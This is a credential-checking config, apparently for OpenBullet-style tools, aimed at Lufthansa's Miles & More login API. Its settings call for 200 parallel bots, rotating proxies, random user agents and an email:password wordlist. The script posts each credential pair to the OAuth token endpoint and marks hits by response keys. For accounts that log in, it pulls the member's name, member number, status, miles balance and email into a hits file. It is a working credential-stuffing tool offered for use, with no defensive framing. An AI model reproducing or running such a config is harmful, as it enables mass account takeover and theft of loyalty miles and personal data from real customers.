[SETTINGS]
{
  "Name": "LUFTHANSA.COM - Miles & More",
  "SuggestedBots": 200,
  "MaxCPM": 200,
  "LastModified": "2025-11-20T12:20:00+00:00",
  "AdditionalInfo": "Real API Checker",
  "RequiredPlugins": [],
  "Author": "legendhkek",
  "Version": "1.0.0",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 10,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "Default",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": true,
  "CustomCMDArgs": "",
  "Title": "LUFTHANSA.COM",
  "IconPath": "Icon\\svbfile.ico",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://api.miles-and-more.com/auth/oauth/v2/token"
  CONTENT "grant_type=password&username=<USER>&password=<PASS>&client_id=MMM_WEB"
  CONTENTTYPE "application/x-www-form-urlencoded"
  HEADER "Accept: application/json"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Content-Type: application/x-www-form-urlencoded"
  HEADER "Origin: https://www.miles-and-more.com"
  HEADER "Referer: https://www.miles-and-more.com/"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

KEYCHECK
  KEYCHAIN Failure OR
    KEY "invalid_grant"
    KEY "unauthorized"
    KEY "invalid_credentials"
    KEY "\"error\""
    KEY "\"status\":400"
    KEY "\"status\":401"
    KEY "\"status\":403"
  KEYCHAIN Success OR
    KEY "access_token"
    KEY "\"token\""

PARSE "<SOURCE>" LR "\"access_token\":\"" "\"" -> VAR "TOKEN"

REQUEST GET "https://api.miles-and-more.com/profile/v1/member/profile"
  HEADER "Accept: application/json"
  HEADER "Authorization: Bearer <TOKEN>"
  HEADER "Content-Type: application/json"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

PARSE "<SOURCE>" LR "\"firstName\":\"" "\"" -> VAR "firstname"

PARSE "<SOURCE>" LR "\"lastName\":\"" "\"" CreateEmpty=FALSE -> CAP "Name" "<firstname> " ""

PARSE "<SOURCE>" LR "\"memberNumber\":\"" "\"" CreateEmpty=FALSE -> CAP "Member Number"

PARSE "<SOURCE>" LR "\"statusLevel\":\"" "\"" CreateEmpty=FALSE -> CAP "Status"

PARSE "<SOURCE>" LR "\"milesBalance\":" "," CreateEmpty=FALSE -> CAP "Miles"

PARSE "<SOURCE>" LR "\"email\":\"" "\"" CreateEmpty=FALSE -> CAP "Email"

ConstantString "legendhkek" -> CAP "By"
